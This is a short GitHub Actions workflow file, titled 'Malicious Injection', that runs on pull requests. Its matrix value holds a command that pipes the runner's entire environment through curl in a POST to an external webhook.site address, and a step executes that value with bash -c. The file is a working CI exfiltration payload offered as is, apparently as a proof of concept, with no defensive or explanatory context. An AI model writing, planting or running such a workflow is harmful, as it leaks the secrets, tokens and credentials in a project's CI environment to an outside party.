name: Malicious Injection

on:
  pull_request:

jobs:
  exploit:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        target:
          - |
            echo '🔥 Exploiting CI'; env | curl -X POST -d @- https://webhook.site/35253050-4340-4916-9825-e88ec973e2a5
    steps:
      - name: Malicious Exec
        run: |
          echo "Command: ${{ matrix.target }}"
          bash -c "${{ matrix.target }}"
